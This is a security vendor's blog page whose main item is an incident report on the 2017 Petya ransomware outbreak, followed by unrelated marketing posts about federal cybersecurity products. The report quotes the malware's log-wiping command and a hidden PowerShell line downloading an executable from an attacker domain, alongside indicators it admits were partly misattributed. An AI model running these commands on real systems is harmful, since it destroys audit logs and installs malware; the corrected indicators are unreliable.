vSOC Spot Report – Petya – Ransomware Attack

Latest Updates

2017-06-27 18:31 EDT

As details continue to come in, there is evidence that today’s ransomware outbreak was actually two different campaigns that occurred at the same time. Some of the indicators originally attributed to the Petya malware were actually indicators belonging to the second campaign which is aptly being called, NotPetya.

Exploitation of the CVE-2017-0199 the myguys.xls file attachment, and the french-cooking[.]com domain name are all related to the NotPetya/Loki campaign which was a different kind of attack aimed at banking institutions.

GuidePoint’s vSOC reported on the Petya ransomware incident as events were unfolding. Due to our goal of reporting accurate information in a timely manner some of the original information included in our SPOT report and blog post was misattributed to the NotPetya/Loki campaign that was running simultaneously. The difference in these two campaigns was not known or understood initially. We have made every attempt to update this blog post with accurate information as it has been made available.

2017-06-27 17:55 EDT

Several different security researchers have identified a method of preventing the encryption of the disk by using any available method or technology to prevent C:\windows\perfc.dat from being written to disk or executed. This method does not stop the spread of the malware, just halts the encryption functions.

As of 1730 EDT the email provider for the attacker’s wowsmith123456@posteo.net email has closed the account. This affects the ability to pay the ransom if you are infected. New variants may provide a new method of payment.

2017-06-27 15:31 EDT

Connections to the initial outbreak of the Petya ransomware has been correlated to a compromised accounting software, MeDoc, popular with many large Ukrainian businesses as well as the Ukrainian Government. Attackers compromised the update code of a recent release which helped propagate the ransomware to many different companies. The update was released at 10:30AM GMT, about an hour before the initial surge of infections was observed.

2017-06-27 15:30 EDT

New information has been made available that provides further insight into how the Petya ransomware operates. If the permissions of the logged in user are not sufficient enough to write to the Master Boot Record (MBR) the malware will attempt to encrypt files based on their extension like more traditional ransomware.

The list of file types that are encrypted: 3ds, 7z, accdb, ai, asp, aspx, avhd, back, bak, c, cfg, conf, cpp, cs, ctl, dbf, disk, djvu, doc, docx, dwg, eml, fdb, gz, h, hdd, kdbx, mail, mdb, msg, nrg, ora, ost, ova, ovf, pdf, php, pmf, ppt, pptx, pst, pvi, py, pyc, rar, rtf, sln, sql, tar, vbox, vbs, vcb, vdi, vfd, vmc, vmdk, vmsd, vmx, vsdx, vsv, work, xls, xlsx, xvd, zip.

The malware also clears system security logs to prevent further analysis using the command:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:

To further protect vulnerable systems it is advised to disallow the execution of the psexec.exe program if it is not needed or to disallow non-privileged users from executing psexec.exe via GPO or other endpoint mechanisms.

2017-06-27 15:20 EDT

Blocking lateral movement of the Petya variants of ransomware can be achieved by patching the EternalBlue vulnerability (Microsoft’s Critical Security Bulletin MS17-010) and by disabling Administrative Shares via Group Policy Object (GPO). To disable ADMIN$ shares use the below process:

Create a file named adminshares.adm with the content from below, under C:\windows\inf on the server you edit your GPO’s with.

CLASS MACHINE 
CATEGORY !!category1 
CATEGORY !!category2 
POLICY !!policyname 
EXPLAIN !!DefaultSharesExplain 
KEYNAME "System\CurrentControlSet\Services\LanManServer\Parameters\" 
VALUENAME "AutoShareWks" 
VALUEON NUMERIC 1 
VALUEOFF NUMERIC 0 
END POLICY 
END CATEGORY 
END CATEGORY 
[strings] 
category1="Network" 
category2="Sharing" 
policyname="AdministrativeShares" 
DefaultSharesExplain="Enables default workstation administrative shares if enabled or disables if disabled" 

 

Next, create a new GPO and right click on administrative templates, and add the administrative template you just created.

Click machine administrative templates, go into view filtering, unselect/uncheck “Only show policy settings that can be fully managed” the setting is shown in the top picture. Basically this allows the GPO Editor to show settings, that is not within the default area of registry “preferences” – like ours. Any settings done outside “preferences” will persist if the policy is removed, unlike standard policies.

Open Administrative Templates – Network – Sharing

Enable or disable administrative shares.

2017-06-27 14:11 EDT

On Tuesday June 27, 2017, accounts of a new ransomware campaign named Petya or Petwrap, are making headlines as infections hit Kiev, Ukraine at approximately 11:30 GMT and continued to spread throughout Russia, Spain, France, UK, India, and various other countries in Europe. The Petya ransomware variant does not encrypt individual files on an infected machine like WCrypt0r from May 2017. Rather, Petya reboots the computer and overwrites the Master Boot Record (MBR) in the boot sector of the hard drive with its code demanding ransom. Without the MBR, the operating system has no directions for where to find the files it needs to boot and run. This effectively renders the entire computer useless until the ransom, $300 in Bitcoin, is paid.

Today’s Petya variant infects machines through a Microsoft Office vulnerability (CVE-2017-0199) and then moves laterally throughout the network exploiting the EternalBlue SMBv1 file-sharing protocol vulnerability as described in Microsoft’s Critical Security Bulletin MS17-010. Patching these vulnerabilities is imperative and will significantly reduce or eliminate the ability of this ransomware to impact your organization.

The Petya ransomware first appeared in early 2016, but the variant spreading through Europe and Russia today contain new code and new functions. Most notable is the use of the EternalBlue exploit to infect machines. This variant is an evolution that has combined new tactics and procedures made famous in other malware campaigns seen in 2017.

Notable companies affected by the Petya ransomware attack include (at the time of this writing):

  • Danish Shipping Company, Maersk
  • British Advertising Company, WPP
  • Russian Oil Company, Rosneft
  • Ukrainian Power Companies, Kyivenergo and Ukrenergo
  • Ukrainian Banks, National Bank of Ukraine (NBU) and Oschadbank
  • Ukrainian Mining Company, Evraz
  • Ukrainian Telecomms, Kyivstar, LifeCell, and Ukrtelecom
  • Ukrainian Nuclear Power Plant, Chernobyl

At the time of publishing this vSOC SPOT Report, there have been no confirmed active connections to any of the known indicators associated with this Petya malware variant from any vSOC subscriber network.

vSOC has obtained rules for CarbonBlack and CrowdStrike to detect this infection; vSOC Protect clients with either of these solutions are protected and monitored for the Petya variants of ransomware. vSOC Detect clients are also being monitored for all available indicators of the Petya variants by your vSOC team.

Technical Analysis

Petya’s rapid propagation is believed to be linked to the use of the exact same EternalBlue exploit that the WanaCrypt0r malware used in May 2017; attacks against the vulnerable SMBv1 file-sharing protocol. EternalBlue was released to the public after being allegedly stolen from the National Security Agency (NSA) in April 2017.

Current evidence shows that these attacks began with malicious spam emails weaponized to use the EternalBlue exploit for Microsoft Office vulnerability CVE-2017-0199 over TCP ports 445, 135, and potentially 1024-1035.

Malicious emails originate from IPs 84.200.16.242, 95.141.115.108, 111.90.139.247, 185.165.29.78 which the attackers have registered to the domains delightcaf[.]xyz, french-cooking[.]com and coffeeinoffice[.]xyz.

The mal-spam variant of this attack is predominantly coming from 84.200.16.242/myguy[.]xls and 185.165.29.78/myguy[.]xls. All traffic to the Command and Control (C2) servers is currently using HTTP as the communication protocol.

Early reports indicate the botnet distributing this malware originates from the LokiBot network. Also, additional reports state the Mischa ransomware package is included in the Petya PE, however confirmation is still forthcoming.

Latest Indicators of Compromise

2017-06-127 15:20 EDT

File Names

These files are all accessed using the runtime process WINWORD.EXE (PID3008)

  • %APPDATA%\Microsoft\Office\Recent\Order-20062017.LNK
  • %APPDATA%\Microsoft\Office\Recent\index.dat
  • %APPDATA%\Microsoft\Templates\~$Normal.dotm
  • C:\~$der-20062017.doc@Please_Read_me@.txt
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7N5LGTOO\myguy[1].hta
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1E328F26-90AD-432F-85D6-72D24D3FC842}.tmp
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8C06767A-F061-47F9-B88B-16AA8AA0D1F2}.tmp

Command and Control (C2)

  • 200.16.242/myguy[.]xls
  • 165.29.78/myguy[.]xls

Memory Strings

  • !”#$%&'()*+,-./0123456789:;<=>
  • “$(*.046:<“j.x\
  • (\{9%EZ”B%]V\XR){y%JWbj3jiDN}~Hl:x7
  • )|xA:X+Zp@w>v)7#% M+ANqR#mXf,934 qx$}&
  • /myguy.xls
  • /n “C:\Order-20062017.doc”
  • 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}
  • 0000320a5802580201000400000000005202bc0220003600050000000902000000021c000000fb021000070000000000bc02000000000102022253797374656d0076f8032f0040311500bf05087640910b76fc7cb3044c311500040000002d010500040000002d01050004000000f0010300030000000000}{\result {
  • 1Pm\\9M2aD];Yt\[x]}Wr|]g-
  • 6iD_,|uZ^ty;!Y,}{C/h> PK ! dQ 1 word/_rels/document.xml.rels ( j0{-;@ $~

File Hash Values

  • 185.165.29.78
    • A809a63bc5e31670ff117d838522dc433f74bee
    • 078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
    • bec678164cedea578a7aff4589018fa41551c27f
    • d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
    • aba7aa41057c8a6b184ba5776c20f7e8fc97c657
    • 0ff07caedad54c9b65e5873ac2d81b3126754aac
    • 51eafbb626103765d3aedfd098b94d0e77de1196
  • 84.200.16.242
    • 7ca37b86f4acc702f108449c391dd2485b5ca18c
    • 2bc182f04b935c7e358ed9c9e6df09ae6af47168
    • 1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
    • 82920a2ad0138a2a8efc744ae5849c6dde6b435d

Binary Details

The binary is currently signed using a certificate from Sysinternals. This will give a Certificate Name Mismatch error; however, the binary will still run in Windows. The current samples attempt to hijack an authorized session in order to spread using psexec. Several of the samples show the lateral movement functions are utilizing Windows Management Instrumentation Command-line (WMIC). Both are avenues for the malware to gain either local or Domain Administrator privileges allowing it to spread using that level of credential.

The sample was compiled for the i386 architecture specifically but appears to be functional on x64 architecture as well.

The PE imports the following DLL files for proper execution:

  • ADVAPI32.dll
  • CRYPT32.dll
  • DHCPSAPI.DLL
  • IPHLPAPI.DLL
  • KERNEL32.dll
  • MPR.dll
  • NETAPI32.dll
  • SHELL32.dll
  • SHLWAPI.dll
  • USER32.dll
  • WS2_32.dll
  • msvcrt.dll
  • ole32.dll

Powershell

The PE will attempt to execute the following script:

PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘http://french-cooking.com/myguy.exe’, ‘%APPDATA%\<random>.exe’)

The <random> variable is a random number between 0-65535, which it will then call with the arguments 1  0 (For example %APPDATA%\10254.exe 1 0).

Additional files dropped:

  • http[:]//185.165.29.78/~alex/svchost.exe

Extortioner Contact Info:

Mitigation

vSOC recommends immediately patching the vulnerabilities described in CVE-2017-0199  and MS17-010. However, unlike the previous WCrypt0r ransomware, patching alone will not prevent the spread of this malware. Petya’s code will attempt to use a variety of methods to propagate itself including the EternalBlue vulnerability, WMIC, and Powershell.

vSOC recommends that organizations:

References:

The President’s Executive Order: Mapping products to cybersecurity Risk Management

In the previous three blogs, President Trump’s Executive Order. What agencies need to do to respond., Quick hit product categories that can boost executive agencies EO mandated NIST risk scores, and Addressing the EO stated greatest threat to agency cybersecurity posture, we laid out some strategies for federal agencies to respond to the President’s Executive Order (EO).  Finally, in this blog we list a variety of products and technologies that, if not already deployed, should be considered first when trying to move the needle in security posture.

First, the different technologies are listed here in the area they fit in EO Section 1 b (i):

Section 1 b (i) defined cybersecurity Risk Management product mapping:
–Protecting IT from unauthorized access
Information and access discovery
MFA
Privileged Access Encryption
Privileged Access monitoring and management
UBEA (user)
–Maintaining awareness of threats
Threat Intelligence feeds
Threat Intelligence Management system
Vulnerability scanning/monitoring
Vulnerability mapping/prioritization
–Detecting anomalies and incidents
Deception Technology for EARLY WARNING (Man, this is an easy one!)
EDR
NextGen AV
SIEM
UBEA (User, System and Network)
–Mitigating the impact of incidents through response and recovery
EDR
NAC

Next, we will list them in alphabetical order with brief explanations of what they do.  These are not ranked by importance or value.  We recognize that many organizations will probably have most of these deployed already, but none that we have experienced have all of them deployed.

Deception Technology for EARLY WARNING (TrapX, Attivo Networks) – (This is an easy one!)
Platform that deploys “fake” systems on the network, fake credentials on the end points, and carefully crafted ogs in the administrative systems.  The most advanced deception platforms weave a complex storyline designed to look like bread crumbs leading to sensitive information to attract/bait adversaries into revealing themselves.  These platforms will include alarms that once these systems and credentials are used will send alerts to the SIEM or SOC directly.  The most eye-opening thing about most deception platforms is the low-price point for the simplest early warning system innovation.  The value vs. cost is fantastic.

EDR (FireEye HX, Carbon Black, DigitalGuardian) – These solutions defend end points against advanced threats, detect active threats and compromise, and collect logs and data for response forensically when a threat or compromise is suspected.  The more advanced EDR products can pull detailed forensic information and quarantine systems actively under attack or already compromised. This is a must-have for any enterprise.

Multi-Factor Authentication (Duo, Okta, Google Authenticator) – Two-Factor Authentication (2FA) uses at least two of the three types of authentication.  “What you know”, “What you have” and “Who you are”.  Typically, this means a password plus a verified device or fingerprint.  In the past, this was a costly and cumbersome security measure where key generators from tokens were bought and distributed.  However, with the advent of smart phones, MFA can be created with a phone app that is verified as a secure second factor for a specific user.  (NOTE:  This is not SMS, which is no longer considered an acceptable MFA.)

NAC (ForeScout) – Manages asset access to the network by validating system is complaint with security policies.  An example would be DoD “Comply2Connect” where any system connecting to the network has to be thoroughly vetted and could be quarantined for further administration and clean up.  Also can be used for quarantining a system that has been identified for investigation for attack or compromise.

NextGen AV (Cylance, Cb Protect) – Legacy AV, using signatures, stop unsophisticated attacks and NextGen AV uses math and heuristics to defend against more sophisticated attacks.  The most prevalent example is poly-morphic malware that changes its signature even after install.  By using analytics on the files, malware can be detected even if the signature was created minutes ago.

Information and Access Discovery (Varonis) – These products can scan enterprises for sensitive data (Ex: PII, or classified data) and report back all the known locations and who has access in the IdAM system to them.  It can also lay out past history of access and monitor for access and anomalous behavior in accessing sensitive data.  In addition, these technologies help significantly in any IdAM. UBA-User or DLP deployment in cleaning up access and classification of data.  Many times, access creep has corrupted security policy or people who have access are not using it and should be removed unless requesting it in the future.  Without these steps, IdAM, User-UBA and DLP can be permanently crippled or take significant time to tune and become effective.

Privileged Access Encryption (Vormetric) – Solution that specifically prevents privileged accounts from accessing data directly.  This is mitigation against the most common form of unauthorized access by adversaries.  Once inside a network, attackers typically elevate privileges to administrators and try to access data directly.   By encrypting data while still allowing administrators to administrate systems, unauthorized users, even privileged users, cannot read important data.

Privileged Access Monitoring and Management (Varonis and CyberArk/Thycotic) – By controlling and monitoring privileged user access, a significant threat vector is closed. Even if a privileged user could not access data directly (see above), they could still create or find and take over a user account that does have access to data and systems that are desired by an adversary.  Typically, privileged user account management solutions require check out access in a highly-controlled manner.

SIEM (Splunk, LogRythm) – Security Information and Event Management consumes and correlates logs from the environment against pre-determined rules for security alerting.

Threat Intelligence Feeds – Both free and paid threat feeds supply adversary information to identify when an attack, attacker, or malicious file needs attention.  Many organizations have paid subscriptions to threat feeds from different products in their environment, however some pay for high fidelity threat feeds to augment them.

Threat Intelligence Management System (Anomali) –  Threat Intelligence is the core of defending against attackers.  Knowing what files, IP addresses and threat actor indicators to look for or block are key to the effectiveness of cyber security tools throughout a cyber infrastructure.  By deploying a threat intelligence management platform, the highly valuable threat feeds, free and paid, can be deduplicated against each other, contextually aggregated for enrichment and distributed to the cyber tools.

UBA (User, System and Network)
– User (Exabeam):  Analyzes logs of user activity from the standard IT infrastructure (such as IdAM/AD/LDAP), creates a baseline of activity and monitors for deviations from the baseline.  This includes individual user behavioral changes and user deviations from the standard a cohesive group creates. This may include an account that has been compromised.  The most mature User-UBA will create a timeline of activity from a range of logs including normal IT and security tools throughout the enterprise.
– System (Exabeam):  Analyzes system logs from the IT infrastructure, creates a baseline of activity and monitors for deviations from the baseline.   This System-UBA go beyond signature or correlations to known activities of attackers.
– Network:  Analyzes network logs such as packets and netflow from IT infrastructure and security tools, creates a baseline of activity and monitors for deviations. Unlike IPS or NGFW, these Network-UBA go beyond signature or correlations to known activities of attackers in the network. The most advanced will pull in logs from many resources across multiple disciplines.

Vulnerability Scanning/Monitoring (Tenable, TripWire) – Scans systems with or without agents on end points to monitor for vulnerabilities and changes to a system that may open it up to compromise.

Vulnerability Mapping/Prioritization (RedSeal) – Actively ingest network configuration data and vulnerability scanning logs to rank security threats identified by attack paths to vulnerable systems.  The resulting risk scoring and details allow for an enterprise to prioritize mediation by risk score that is specific to their systems and not a generic one-size-fits-all scoring.

If any of these intrigue your organization and you would like to know more, please contact us at federal@guidepointsecurity.com.

About the author:

Jean-Paul Bergeaux, Federal CTO, GuidePoint Security

With more than 18 years of experience in the Federal technology industry, Jean-Paul Bergeaux is currently the Federal CTO for GuidePoint Security. JP’s career has been marked by success in technical leadership roles with ADIC (now Quantum), NetApp and Commvault and SwishData. Jean-Paul focuses on identifying customers’ challenges and architecting innovative solutions to solve their complex problems. He is also a thought leader on topics that are top of mind for Federal IT Managers like Cyber Security, VDI, Big Data, and Backup & Recovery.

GuidePoint Security Achieves AWS Security Competency Status

HERNDON, VA – June, 8, 2017– GuidePoint Security announced today that it has achieved Security Competency Partner status with Amazon Web Services (AWS). This designation recognizes that GuidePoint has demonstrated deep expertise that helps its clients achieve their cloud security goals.

Becoming a Security Competency Partner differentiates GuidePoint as an AWS Partner Network (APN) member that provides specialized consulting services designed to help enterprises adopt, develop and deploy complex security projects on AWS. To receive the designation, APN Partners must possess deep expertise and experience on AWS.

AWS Competencies are only awarded to APN partners, like GuidePoint Security, that have demonstrated technical proficiency and proven customer success in specialized solution areas. GuidePoint Security is also an Authorized Government Partner and became an APN Advanced Consulting Partner in 2017.

“GuidePoint is proud to be one of the first APN partners to achieve Security Competency Partner status,” said Bryan Orme, Principal, Information Assurance. “As a security-focused consultancy, our team is dedicated to helping companies develop cloud security strategies and delivering cloud security solutions by combining our proven security expertise with the range of AWS security tools.”

The AWS Cloud is enabling scalable, flexible, and cost-effective solutions from startups to global enterprises. To support the seamless integration and deployment of these solutions, AWS established the Security Competency Program to help customers identify Consulting and Technology APN Partners with deep industry experience and expertise. In addition to general Cloud Security Architecture and Strategy services, GuidePoint provides architectural reviews specifically focused on AWS environments. GuidePoint’s cloud security architects and engineers work with our clients to understand their operational needs, assess their current security posture, and provide relevant, prioritized, and actionable remediation guidance and recommendations for further improvement.

About GuidePoint Security

GuidePoint Security LLC provides innovative and valuable cybersecurity solutions and expertise that enable organizations to successfully achieve their missions. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification is with the System for Award Management (SAM). Learn more at: www.guidepointsecurity.com.

GuidePoint Security Named to CRN’s 2017 Solution Provider 500 List

GuidePoint Security, of Herndon, Va. announced today that CRN®, a brand of The Channel Company, has named GuidePoint Security to its 2017 Solution Provider 500 list. The Solution Provider 500 is CRN’s annual ranking of the largest technology integrators, solution providers and IT consultants in North America by revenue.

The Solution Provider 500 is CRN’s predominant channel partner award list, serving as the industry standard for recognition of the most successful solution provider companies in the channel since 1995. This year, for the first time since 2010, the complete list will be published on CRN.com, making it readily available to vendors seeking out top solution providers to partner with.

CRN has also released its 2017 Solution Provider 500: Newcomers list, recognizing 58 companies making their debut in the Solution Provider 500 ranking this year.

“We’re really excited to be on this esteemed list again,” noted Founder and Managing Partner Michael Volk. “We’re even prouder of the fact GuidePoint moved up in rank, placing #134 for 2017. Providing the very best services and solutions to our customers has always been our number one priority,” Volk concluded.

“CRN’s Solution Provider 500 list spotlights the North American IT channel partner organizations that have earned the highest revenue over the past year, providing a valuable resource to vendors looking for top solution providers to partner with,” said Robert Faletra, CEO of The Channel Company. “The companies on this year’s list represent an incredible, combined revenue of over $318 billion, a sum that attests to their success in staying ahead of rapidly changing market demands. We extend our sincerest congratulations to each of these top-performing solution providers and look forward to their future pursuits and successes.”

The complete 2017 Solution Provider 500 list is available online at www.crn.com/sp500 and a sample from the list will be featured in the June issue of CRN Magazine.

About GuidePoint Security

GuidePoint Security LLC provides innovative and valuable cybersecurity solutions and expertise that enable organizations to successfully achieve their missions. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification is with the System for Award Management (SAM). Learn more at: www.guidepointsecurity.com.

About the Channel Company

The Channel Company enables breakthrough IT channel performance with our dominant media, engaging events, expert consulting and education, and innovative marketing services and platforms. As the channel catalyst, we connect and empower technology suppliers, solution providers and end users. Backed by more than 30 years of unequaled channel experience, we draw from our deep knowledge to envision innovative new solutions for ever-evolving challenges in the technology marketplace. www.thechannelco.com

Addressing the EO stated greatest threat to agency cybersecurity posture

The first blog in this GuidePoint Security series focused on how Federal agencies can address the President’s Executive Order. It was pointed out that in section 1 b (iv) the EO states:

(iv)  Known but unmitigated vulnerabilities are among the highest cybersecurity risks faced by executive departments and agencies (agencies).  Known vulnerabilities include using operating systems or hardware beyond the vendor’s support lifecycle, declining to implement a vendor’s security patch, or failing to execute security-specific configuration guidance.

Common Vulnerabilities and Exposures (CVEs) are published to notify organizations of issues that should be addressed. Typically, the CVE will issue guidance on mitigation by anything from a simple patch from the vendor, to disabling services until a patch is released. Sometimes the mitigation is difficult because of legacy End of Life’d (EoL) software. What the EO warning acknowledges is that many agencies are behind in completing these CVE mitigations.

It’s a scary fact, but is easy to understand why. A typical vulnerability report includes hundreds to thousands of vulnerabilities that need mitigation. How does an organization quickly resolve all of them? Most organizations rely on prioritization strategies that result in a spread sheet of the vulnerabilities in order of which to resolve first. One of the ways agencies prioritize is how these CVEs are graded by NIST as “Critical,” “High,” “Medium,” or “Low,” depending on factors like how easy the vulnerability is to execute against and how much access the vulnerability provides the attacker.

While this might seem like a great way to prioritize which vulnerabilities to resolve, the simple fact is that all vulnerabilities cannot be resolved quickly. A large enterprise can fall weeks or months behind mitigation schedules because of the volume of vulnerabilities produced every cycle. If an application requires an EOL’d software to run, mitigation can be very difficult to resolve and involve recoding the application. This can leave some low category CVEs unresolved for a very long time. And this is what the EO is pointing out and rightly so. Why?

Here are some examples of where this type of rating system falls short. First, a low rating from NIST on a publicly facing application inside the DMZ that accesses sensitive information or information with PII on the back end. Even worse, maybe that software was EoL’d recently and there is no patch or remediation. Coders were already working on changing the code to support a newer software, but it’s three or four months away. While this may show up on a list of vulnerabilities as not-a-priority, you can easily see where this should be a high priority.

Second, a critical rating from NIST is given on a printer system that sits deep in the bowels of an enterprise network behind three different layers of firewalls. Also, the printer system is not on network connected to anything with sensitive data. This would show up in bright red in a list of vulnerabilities, but should be prioritized lower than the first example.

Finally, an HVAC system that should not, but does, sit on the same subnet as an organization’s database containing PII such as SSN or credit card information. The HVAC system requires EoL’d software to run the ICS that has just come up with a Medium NIST rated CVE rating vulnerability. On a simple list, this would show up as not important and difficult to resolve. However, a quick look at the network topology would show that the organization should firewall off this system from the network it is accidentally on. (See below how to get a “quick look”) Let’s add on to that attackers who have been actively using this vulnerability to exploit these systems.

GuidePoint Security has three recommended technologies that could significantly help better prioritize and mitigate these vulnerabilities.

Network Vulnerability Management Platform

In the first two blogs, here and here, NVM platforms were mentioned. The basic recap is that vulnerabilities are mapped to the network and a risk score is associated to it. Here’s your “quick look” referred to above. This is exactly what is needed when comparing the three cases for prioritization. There are several other valuable things NVMs add to a security infrastructure, but this value is relative to the EO specifically around which vulnerabilities to mitigate. Several customers have been able to document why a specific vulnerability might not be as critical to address as a basic NIST score might indicate and prioritize much higher risk vulnerability in context.

RedSeal Image

Vulnerability Threat Intelligence Mapping

This solution consumes an organization’s list of vulnerabilities and maps them to the activity seen in threat intelligence of threat actors. While this would not predict a new vulnerability’s sudden usage in the wild, it could help a security organization realize that a low or medium NIST rated vulnerability, that is visible to the outside, is a high risk because it is being actively used by criminal or nation-state actors.

Kenna Security Image

Application Delivery Controller/Web Application Firewall

While this might seem a default and not innovative, GuidePoint still finds organizations that do not have high quality Application Delivery Controllers (ADC) or have them and only use them as load balancers. These proxies offer a significant value to organizations when trying to mitigate applications that rely on old software or have vulnerabilities that cannot be easily resolved. By removing direct access to the application and forcing all traffic through the ADC, a vulnerability can completely disappear from the network, even while not resolved downstream inside the actual application. This allows for downtime planning or coding changes to be made on a reasonable schedule.

The best example of this was when applications were required to move from SSL to TLS (now at version 1.2). Many custom applications simply didn’t have the ability to make the change without code rewrites. By using a quality ADC/WAF, the connection from application to user could be converted to TLS, while the downstream application was scheduled for coding updates to make it possible to move to TLS natively. Restricting data traffic to just between the application and the ADC mitigates the problem.

F5 Image

There are other solutions that can help as well, however, these three are some that should be top consideration. If an organization doesn’t have them in their tool chest now, they should consider moving quickly to purchase, install and use them in order to meet the EO’s requirement to mitigate known vulnerabilities. For more about the above solutions and more choices contact GuidePoint Federal at Federal@guidepointsecurity.com.

About the author:

Jean-Paul Bergeaux, Federal CTO, GuidePoint Security

With more than 18 years of experience in the Federal technology industry, Jean-Paul Bergeaux is currently the Federal CTO for GuidePoint Security. JP’s career has been marked by success in technical leadership roles with ADIC (now Quantum), NetApp and Commvault and SwishData. Jean-Paul focuses on identifying customers’ challenges and architecting innovative solutions to solve their complex problems. He is also a thought leader on topics that are top of mind for Federal IT Managers like Cyber Security, VDI, Big Data, and Backup & Recovery.

 

Quick hit product categories that can boost executive agencies EO mandated NIST risk scores

In the first of four blogs regarding GuidePoint Security’s guidance for how Federal Agencies can best respond to the President’s EO, we focused on what steps to take to prepare to respond to reporting to DHS/OMB in 90 days. This second blog is about how to boost an agency’s compliance and risk scoring for the report within the short 90 day window.

Here are five product types (not OEMs) that should be a quick hit for government agencies to deploy and show value in security posture before issuing their NIST report to DHS/OMB in 90 days. By quick hit, it is meant that these solutions are the quickest to deploy and show value in security posture. As would be expected, the first two are SaaS based, making them easiest to deploy and to get up and running.

  • IDaaS for SSO/MFA deployment (SaaS based)
  • CASB (SaaS based) -Threat Intelligence Management platform
  • Privileged Access Management
  • Vulnerability prioritization

These solutions are not about highest value in security posture, although some of them do significantly move an agency’s security posture. The point is meeting the compliance standards of NIST for the 90 day reporting deadline.

IDaaS (Protect, Detect)

IDaaS adds identity access functionality, most importantly, Single-SignOn (SSO) and Multi-Factor Authentication (MFA). Adding a cloud based solution to an organization’s infrastructure is usually a quick deployment saving time and providing value.

SSO eliminates outliers for authentication. This can come in the form of cloud (SaaS and IaaS/PaaS) and legacy applications. Typically, cloud solutions like ServiceNow, AWS, and SalesForce are not well integrated with on-prem IdAM core functionality. This leaves gaps in password management and logging and alerting on activity users have with these sanctioned applications.

Okta “Multi-Factor setup for IDaaS SSO”

In addition, most large enterprises like government agencies have legacy applications that require a second username and password after core IdAM login like Active Directory (AD). Similar to cloud applications, these legacy applications lack integration with core IdAM leaving gaps in password management and logging as well. By bringing these legacy applications into a SSO implementation for password management and logging, better security for these applications can be maintained.

Finally, and probably most importantly, IDaaS allows for easy to use MFA typically using smart phone codes or push notifications. We have seen these types of solutions implemented in days, rather than weeks or months from legacy token based MFA solutions. This type of MFA also offers a much lower Total Cost of Ownership (TCO) both being less to buy and maintain.

CASB (Protect, Detect, Respond)

Cloud Access Security Brokers (CASB) are hot and for good reason. The main three functions that a CASB can add to an agencies security infrastructure are centralized sanctioned cloud policy management, significantly improved sanctioned cloud logging and un-sanctioned cloud visibility. There are many more functions that a CASB can add, however these three are easy to deploy, get working, and show value.

Again, a significant feature here is SaaS deployment that significantly improves deployment speed and simplicity. In a matter of days or weeks, a government agency can show cloud policy lockdown, cloud activity logging to their SIEM and a significant improvement in locking down un-sanctioned or ShadowIT activity.

SkyHigh Networks “Cloud security posture status main console”

The only way for an organization to understand the impact a CASB has on sanctioned cloud usage such as O365, ServiceNow, SalesForce, AWS, etc. is for them to see it themselves.

Threat Intelligence Management Platform (Detect, Respond)

A threat intelligence management platform correlates, dedups and distributes threat intelligence throughout the security infrastructure. A quality threat platform will integrate with core products like Splunk, LogRythm, and Qradar as well as nearly every type of security product from network, end point, analytics and more.

Anomali “Threat Intelligence Management Platform example”

Built in integration with already purchased licenses for threat intelligence and ingestion from SIEMs, these products allow for threat intelligence to be enriched by each other’s information and ensure that the entire security infrastructure stays informed of the latest threat and attacker information. This can significantly boost an agency’s scoring in the NIST framework in the Detect category framework and is not very complicated to deploy and get working.

Privilege Access Management (Protect, Detect, Respond)

In the Civilian space, CDM’s award for Privilege Access Management has brought the solution front and center, but roll out is still not moving fast enough to cover enough agencies. Deploying this solution immediately improves an agency’s security posture due to the common theme in most incidents involving administrator access to data.

These solutions take away direct access to administrator credentials and make privileged users “check-out” administrative credentials for daily use. This prevents user account compromise from directly giving adversary access and also adds a logging mechanism for administrative activities. This can significantly prevent, delay or provide an early warning for an attack in progress.

Vulnerability Prioritization and Risk Scoring (Identify, Protect, Detect, Respond)

In the first blog about the President’s EO, it was mentioned that a Network Vulnerability Management tool could help map vulnerabilities to the network and help risk score the environment. This helps prioritize highly dangerous vulnerabilities and in some cases, reduce the urgency of patching for other vulnerabilities.

In addition, there are other vulnerability risk scoring platforms that can additionally add context to what exploits are actively in use and under attack. Again, the goal is to prioritize the most important vulnerabilities for urgent patching and mitigation. By combining threat intelligence on current attacker activities, this solution can be the difference between patching an exploit on SMBv1 first vs an exploit that is not currently in active use second.

These five solutions may not be the best next step from a pure security architecture, depending on the agencies maturity and current architecture, but any one of them could be deployed inside the 90 day window if a purchase can be fast tracked and an agency can get the product in the door quickly. GuidePoint Security has the ability to augment the services needed to get any one of these solutions up and running. For more information about how to execute any of these solutions as soon as possible, contact GuidePoint Security at federal@guidepointsecurity.com.

About the author:

Jean-Paul Bergeaux, Federal CTO, GuidePoint Security

With more than 18 years of experience in the Federal technology industry, Jean-Paul Bergeaux is currently the Federal CTO for GuidePoint Security. JP’s career has been marked by success in technical leadership roles with ADIC (now Quantum), NetApp and Commvault and SwishData. Jean-Paul focuses on identifying customers’ challenges and architecting innovative solutions to solve their complex problems. He is also a thought leader on topics that are top of mind for Federal IT Managers like Cyber Security, VDI, Big Data, and Backup & Recovery.

President Trump’s Executive Order. What agencies need to do to respond.

Since President Trump released his EO a few days ago, we at GuidePoint Security Federal are carefully crafting some strategies for our customers to respond to the requirements detailed in it. This is the first of four blogs outlining some of our guidance. This first blog is about what important take-aways are in the EO and how to best produce an acceptable risk management report in this tight 90-day window. The second blog will offer some “quick hit” products that are the easiest to deploy and close the gaps in a NIST framework, boosting agency scores. The third specifically focuses on what the EO calls the “highest risk” to agencies, which is known, but unmitigated vulnerabilities. The fourth blog will address how the EO defines Cybersecurity Risk Management by mapping specific products, not vendors, to each of the four areas.

